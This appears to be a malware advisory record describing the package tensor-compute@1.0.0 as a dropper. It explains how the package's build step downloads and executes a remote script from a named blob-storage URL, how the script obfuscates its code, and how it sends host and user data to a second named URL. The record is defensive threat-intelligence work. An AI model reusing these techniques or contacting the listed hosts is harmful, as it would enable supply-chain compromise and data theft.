---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9a3d1b50077a6311a43061891fa560d2c180fbdbd12ab4965e0d265910e6ef68)

tensor-compute@1.0.0 presents itself as a Rust-backed tensor library but is a dropper. setup.py registers a custom build_ext command (src/build_ext.py) whose run() invokes RustBuildContext.build() → collect_version_cache(), which uses urllib3 (with TLS warnings disabled) to GET https://odifkwepasasf.blob.core.windows.net/share/standalone.py and executes the response body via exec() in a background daemon thread during pip install. No integrity verification is performed (a sha256 is computed but never compared). The shipped stage-2 (standalone.py, also present in obfuscated form as standalonobf.py via base85+zlib+XOR with a strong_combined_obfuscator header) checks a SHA-256 hostname/domain allowlist, then collects hostname, FQDN, USER/DOMAIN, OS, arch, Python version, username, and resolved IP, XOR-encodes them, and exfiltrates to https://telemetry021312.blob.core.windows.net/share/tensor-compute?v= with a spoofed Chrome User-Agent. Cover-story signals reinforce intent: tensor_core.c is a stub, simulate_rust_compilation() forges ELF/Mach-O/MZ headers to fake a native build, and pyproject.toml/setup.cfg carry placeholder author metadata (Your Name, your.email@example.com, yourusername).

Source: kam193 (65d708cc1f7f21e95b09b365734e06251c59f931bf07ff7fbb004713064bcae7)

The package performs a targeted attack on specific environments. During building the native extension and import, the code attempts to download and execute code from a remote location. Access to the remote code is filtered. In another place, code performs basic exfiltration after verifying the environment it executes in.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-tensor-compute

Reasons (based on the campaign):

• targetted-attack

• Downloads and executes a remote malicious script.

• obfuscation

• The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.